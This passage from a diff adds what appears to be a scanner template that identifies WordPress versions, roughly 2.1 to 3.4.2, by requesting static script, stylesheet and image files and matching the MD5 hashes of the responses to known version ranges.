dsl: + - "(\"c38cc928b95c0be49ec083648084d190\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/img/page_bug.gif" + matchers: + - type: dsl + name: 2.5 - 3.3.3 + dsl: + - "(\"32a68c86a6beffdd042abf0b0c595328\" == md5(body))" + - method: GET + path: 
+ - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/css/content.css" + matchers: + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"585d53dec7b08788b4e495da6814eacf\" == md5(body))" + - type: dsl + name: 2.9 - 3.1.4 + dsl: + - "(\"be695b0573d9ef0b904587313fd6096d\" == md5(body))" + - type: dsl + name: 2.5 - 2.8.6 + dsl: + - "(\"947de1cd730bff4b3cea0bc8c5ec1178\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/gray-star.png" + matchers: + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"bea6d3557d9c1b9e3d9044aa685f72c3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/star.png" + matchers: + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"6c8273e7a485fb777314ea9d0b5a103b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screenshots/new-feature-pointer.png" + matchers: + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"b9a135aa45236114cfcb912588bbaf41\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screenshots/admin-flyouts.png" + matchers: + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"ac4ce1abdb2814481f88b1d5289138b8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screenshots/welcome-screen.png" + matchers: + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"cbdc66a4da2be082ac6c7c35670de6ce\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screenshots/drag-and-drop.png" + matchers: + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"259572a5fa2e3ed4a48411e28fe7186f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screenshots/coediting.png" + matchers: + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"d335598bfe9f059385fd1afdb9680757\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screenshots/help-screen.png" + matchers: + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"a8c952481d58a5263790cce713e2b7c4\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-admin/images/screenshots/media-icon.png" + matchers: + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"159783652897f6b290d9a56a60f37492\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/logo-login.png" + matchers: + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"f3473a97f55aac098f90e978181ae4d1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/upload.png" + matchers: + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"64f033ed3bb680dba682829fe46ac34a\" == md5(body))" + - type: dsl + name: 2.7 - 2.9.2 + dsl: + - "(\"11904681d8fc3a10d44a96acec2d9044\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/wp-pointer.dev.css" + matchers: + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"1585519d5f7f27cd872e9c1f74e7157a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/jquery-ui-dialog.dev.css" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"c9a392cb6e9f1715c9150031b0f0fea3\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"4f5c825f9860c328cdd1b5b878971264\" == md5(body))" + - type: dsl + name: 3.1 - 3.2.1 + dsl: + - "(\"3566f3b34a5a24f0763900dd3cf410fc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/admin-bar-rtl.dev.css" + matchers: + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"773b68ebb25a383788c7080043b0350b\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"1f8d37bc83dd53b154ae924c0cd040ec\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"bf615625d772465e039ff5391650ca0a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/admin-bar.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"10fee05fc3a9b14be7bf83b0f5669b48\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"266a1b0885cfe3ec9d60667e6a15da9b\" == md5(body))" + - type: dsl + name: 3.1 - 3.2.1 + dsl: + - "(\"ddf7d05d4beb316f0d4a80f23ffb3225\" == md5(body))" + - method: 
GET + path: + - "{{BaseURL}}/wp-includes/js/hoverIntent.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"73e23cc2a686c50a9f80746d5fde8eb5\" == md5(body))" + - type: dsl + name: 2.8 - 3.3.3 + dsl: + - "(\"d0d5fed467b2ac6c1b79e88ec7a8b514\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/plupload/handlers.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"5890cd4d95125931f0e0650601e2a647\" == md5(body))" + - type: dsl + name: 3.3.2 - 3.3.3 + dsl: + - "(\"92b374ca4bf0f5dfde86ea01725b5d2c\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.1 + dsl: + - "(\"7f80b44718dd1d025d401549b5a00685\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/scriptaculous/builder.js" + matchers: + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"33e43995385a54d175516d8ede7d75b9\" == md5(body))" + - type: dsl + name: 2.5 - 2.9.2 + dsl: + - "(\"92cc9bddf6afcff5e641eeba9e3eacc0\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"f2abb2f2083b5d2a9e2ab1d821fc72bf\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"5cf5f6ccca0fa4c4c8a0428e9240b81a\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"6b737ecca99b73e70149195653627e4a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/scriptaculous/effects.js" + matchers: + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"0efe4a1f7374463232bc598926a7b4d4\" == md5(body))" + - type: dsl + name: 2.5 - 2.9.2 + dsl: + - "(\"29a97dc0bf45c93560b28421843b75c2\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"ab48b4f30f63f701e491ba9bb1b5451d\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"be6dba6cd4a57fc1dade9b547fc614d9\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"5723ef231fd913fa981a3dc5a2492131\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/scriptaculous/scriptaculous.js" + matchers: + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - 
"(\"f333a7a32a2b7549853d606e50bee5d5\" == md5(body))" + - type: dsl + name: 2.5 - 2.9.2 + dsl: + - "(\"b4c44f312deb6cd7f76f8684276da04c\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"1bfeb4bd1d53b1951c25b51523471e1a\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"211d955609da0b228a65487384b95722\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"ba6e48c926618bb08b6a5853efeb2463\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/scriptaculous/unittest.js" + matchers: + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"3ef5747adec5039f18816f2b2fb8cd6b\" == md5(body))" + - type: dsl + name: 2.5 - 2.9.2 + dsl: + - "(\"b41840d00193331f0fb68fc54f1085c6\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"3ae6f077da09244c08349e8920eee880\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"9ffcc3a22dbfeb9e5665247f376deb76\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"19e5e5117633a8bc41724d0bc67e4162\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/scriptaculous/slider.js" + matchers: + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"7f9ed11dfea85c958a7fee63515ff930\" == md5(body))" + - type: dsl + name: 2.5 - 2.9.2 + dsl: + - "(\"e38b722aa3e5bf6f52c521d9fca0235f\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"8baa57d7d4382b95dcb953e7132d31c4\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"a35f869479bb76b2d0de3aaa808ead5e\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"e1169fc74b36a0c1529a15a85feda299\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/scriptaculous/dragdrop.js" + matchers: + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"7b4c10c6a6783b1d60625ff4b0b34b3e\" == md5(body))" + - type: dsl + name: 2.5 - 2.9.2 + dsl: + - "(\"e07ef5d6af2980f8e72cd74e67690a54\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - 
"(\"f5fd2822d8577d30cb998566645f1fe6\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"f41cfdb65270e6f50eb1cce7cee52902\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"2a8ba7d2631729bb53b42530d522ff08\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/scriptaculous/MIT-LICENSE" + matchers: + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"4af5bdb483496e1c4db85a3fb03b5b6e\" == md5(body))" + - type: dsl + name: 2.5 - 2.9.2 + dsl: + - "(\"b72c811c3e4b902332903aacd47eef47\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"9f3d5ea8e5c0e7c721a40dc22ea20c72\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"644476df73032b063a33b199a3003fd8\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"b86a0a3506f37117d1540c359b1a7ed8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/scriptaculous/wp-scriptaculous.js" + matchers: + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"360573487f5e7830b54f27af815a0a58\" == md5(body))" + - type: dsl + name: 2.5 - 2.9.2 + dsl: + - "(\"1b6a98a2e2b55d90a88524faea79f0a8\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"1bfeb4bd1d53b1951c25b51523471e1a\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"c0deff8348d644fe7727daa4415de64d\" == md5(body))" + - type: dsl + name: 2.1.1 - 2.1.3 + dsl: + - "(\"7a44c05d1d583369275dba694ff14a3f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/scriptaculous/sound.js" + matchers: + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"69ffb734e10e8d1ef0e7a251ec0ca539\" == md5(body))" + - type: dsl + name: 2.5 - 2.9.2 + dsl: + - "(\"d654e517c3813d9a21280b6c2e58a8db\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"5a58260c9ccef7a67ae2e4f7d07f9ea9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/scriptaculous/controls.js" + matchers: + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - 
"(\"8df54b04b3a05b5a5d68643cde67f77b\" == md5(body))" + - type: dsl + name: 2.5 - 2.9.2 + dsl: + - "(\"fcf61880c81c69a8c892020de19216e6\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"6e5f2d4fd9802a5cbc2e7ff7cf6674ec\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"3caf5091b68f3a6afaf881744509d4c6\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"23cef7404ffe6d410b0c235433771d51\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/prototype.js" + matchers: + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"965fe52b851d8ff3c2b915ada9fb273f\" == md5(body))" + - type: dsl + name: 2.5 - 2.9.2 + dsl: + - "(\"bab4179aef164e96e866b03ac432bdf7\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"3766aeff5778b54f74f93670322ca0df\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"ed2d6608b0832c5e990e10729157b485\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"e4d323d8dfe7260fe01cefe6143f094d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/autosave.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"f62b83e650dce98e19b872eb43689298\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"af6a27d4947af4b7fdbfd0ed7c00d455\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"9aea40acf0c39e1ed27ce59b0e38576b\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"24373f9824e45b2c2e9e5c6286fe2f78\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"2b4fe432af9394459e60dbad48c11459\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"8ff33e244aaae79e1547003b03dffc3a\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"10cd5dfe482cfff61d7e628a81e61922\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/customize-loader.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"96e5dedaddcfa2e0514f29bf1dd402c8\" == md5(body))" + 
- method: GET + path: + - "{{BaseURL}}/wp-includes/js/comment-reply.dev.js" + matchers: + - type: dsl + name: 2.8 - 3.4.2 + dsl: + - "(\"20ef5771571f1be483869066b2830c2f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wplink.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"dc327b2e93ae86b3be62a536379457e9\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"23e5ee4b8b9d543add71e8191cf3c90e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tw-sack.dev.js" + matchers: + - type: dsl + name: 2.8 - 3.4.2 + dsl: + - "(\"b989a5bd84f6ebcbc1393ec003e6e991\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-ajax-response.dev.js" + matchers: + - type: dsl + name: 2.9 - 3.4.2 + dsl: + - "(\"54b536447cd644bcafa51a568be8c54e\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"ddc65b357dbc1b10b4a9eeb97a4bd704\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/quicktags.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"191ea92b9cdd1a23d48ad67fba256f0a\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"2f4dbf99b6555cff7e2bceda7986b269\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"1435292e5022e57170c6bd710fffb085\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"5a299970e59a4155990a34066e4bd41a\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"0ee241770ed514d28020ddedc9db2326\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/swfupload/handlers.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"793ff9921f096583ba52f8606ec79f4c\" == md5(body))" + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"95eb0e3071c8eb18628fcd952e4b6384\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"4c158d390795fa26ae94a33f62c02885\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"59ff0a965a09179e90282c94f4eb3098\" 
== md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"6659d58b56b0aa9121f88dd048acee1c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery.form.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"1210dad363fcd0a43dc28244b69369f9\" == md5(body))" + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"e18e58c9f23c19a9b0233af61e1f5308\" == md5(body))" + - type: dsl + name: 2.8 - 3.1.4 + dsl: + - "(\"820f80306571dbe0a1deb0b63496d85f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery.color.js" + matchers: + - type: dsl + name: 2.8 - 3.4.2 + dsl: + - "(\"5291cf4f8f19bd8692befbebc2761440\" == md5(body))" + - type: dsl + name: 2.5 - 2.7.1 + dsl: + - "(\"ec1d98b35884ecc9de0e6f058fefe6b8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery.color.dev.js" + matchers: + - type: dsl + name: 2.8 - 3.4.2 + dsl: + - "(\"ec1d98b35884ecc9de0e6f058fefe6b8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery.hotkeys.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"a7ad102b68229e728863325d0efec72e\" == md5(body))" + - type: dsl + name: 2.8 - 3.3.3 + dsl: + - "(\"dfdd8d2cc9be955dbb8dd14aae1daf40\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.effects.fold.min.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"f69b3b79f4bcf7469073043135cf6307\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"59cdbee6307a4fce031bbd89009a82e8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.effects.core.min.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"6c97a90bce71c640c4a78753a4c589ec\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"d5112dfa4dd8e8f8067081cbd8be3ae3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.effects.highlight.min.js" + 
matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"42313e472b34be79275d6006b8530d33\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"34b4be2a83a8eebb16ac5297a7dcfde9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.effects.explode.min.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"8ac1dfce432d3647b3ff1ebe8031ce6f\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"d8ba624f5336b14a49f56ca304982cb7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.effects.blind.min.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"10b40853994ade768b452861bb0896c4\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"1e2a8b2eed5b1b2f24e12adc436c2b44\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.effects.bounce.min.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"abd026273ad30b0122973bd085e4d9be\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"873b92422573849fad6cccb726c2e6bc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.effects.transfer.min.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"577573b3f3586e9f239a82b4066993fd\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"3c127931b63007c90efff1e507947ff6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.effects.clip.min.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"bdc3cf35b8dbf9c95533a7041b7997a7\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"35ba32293d3a1074e2b5d17407a1cb66\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.effects.fade.min.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"573626f9df72877a8255b4b7cdbaa6d2\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - 
"(\"bba378cc8a154be8b3af270b42d7143b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.effects.pulsate.min.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"cf94d2a6a7f254ae983a859b96b22e48\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"fc421b7d814dddec5b97de420b2674c1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.effects.scale.min.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"40ca173ecd15c47c39fc04864a4ad9f5\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"a1f7d2ad92d7a574ba40a6ae3efa8e10\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.effects.drop.min.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"c78aae2ed48fe5c20e6f301d2121b506\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"e50bdec823723dac7508d2343559c598\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.effects.shake.min.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"0f7eda61dce38226f959fe4128118b94\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"560554c3e186ad5ec2ce909a858257b6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.effects.slide.min.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"f4fdf642ec7e0cab73ce242ef9789025\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"709c80dab78bcb4ea4b2344b0174c4cf\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/suggest.dev.js" + matchers: + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"4da8fd7204488b2d4541a426c1d351ce\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"24afc2920f7ace150877a5bcbd39f409\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery.table-hotkeys.dev.js" + matchers: + - type: dsl + name: 2.8 
- 3.4.2 + dsl: + - "(\"baa8747ae1cb2d15755733fa4f96f1b7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-list-revisions.dev.js" + matchers: + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"10b8adab39fa790c52bac5c59cead9a8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jcrop/jquery.Jcrop.css" + matchers: + - type: dsl + name: 2.8 - 3.4.2 + dsl: + - "(\"3888e9f93e218814c97a146069d104f1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jcrop/jquery.Jcrop.js" + matchers: + - type: dsl + name: 3.1 - 3.4.2 + dsl: + - "(\"e363e3b8839e5db9fa0260eeabfac23e\" == md5(body))" + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"ead9e5f733592ae8f9b227507de37ee6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jcrop/jquery.Jcrop.dev.js" + matchers: + - type: dsl + name: 2.8 - 3.4.2 + dsl: + - "(\"ed882314c841932770eab4413337b4b0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/colorpicker.dev.js" + matchers: + - type: dsl + name: 2.8 - 3.4.2 + dsl: + - "(\"a513cd35728deb3db7dcb9b75da0a62d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-pointer.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"9fb67c2257a8111e496014c2d2f3a930\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"42396561deb435781feb07f63e7c6039\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/ui.css" + matchers: + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"a2992e048f28ae11937e337d5d7c9be7\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"be18fcaa0cd42745ac9c405543a1336b\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"0e570cb840d2c73dcd7df92be165f9e9\" == md5(body))" + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"a464cac9829cb4b064c6e3f91fcccb7c\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - 
"(\"924d870e2ef4a1e18fb47fe5bccf7111\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"dfe72f9deb99c91098ba3b1b11f63e50\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/js/editimage.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"0a25f1ee5635ea5c98d12fe6a25124dd\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"367a7bc01297b49618ee3900b424d1d9\" == md5(body))" + - type: dsl + name: 3.0 - 3.2.1 + dsl: + - "(\"fda7ac60d42b36416c6f1590929cc2a7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpdialogs/js/wpdialog.dev.js" + matchers: + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"21df9dbdbe1be96d4e1822bf08513a04\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpdialogs/js/popup.dev.js" + matchers: + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"ed402838f592c94f7193ea14f8b6080d\" == md5(body))" + - type: dsl + name: 3.1 - 3.2.1 + dsl: + - "(\"2a77fd1e668cca9cc75779f9a5f1e912\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/json2.dev.js" + matchers: + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"74d903049683e5bbea9ccb7544a42bca\" == md5(body))" + - type: dsl + name: 2.9 - 3.1.4 + dsl: + - "(\"8b5970b79549b145296e6ec137eb5edb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/customize-base.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"96113df5c6d74956eaa855233e4740b2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/menu-arrow-frame.png" + matchers: + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"91eb07c759f3fcd0b8ec0d8d50004657\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/menu-dark-rtl.gif" + matchers: + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"b6f525c71c056ecedfd837daf18c3c4a\" == md5(body))" + - method: GET + path: + - 
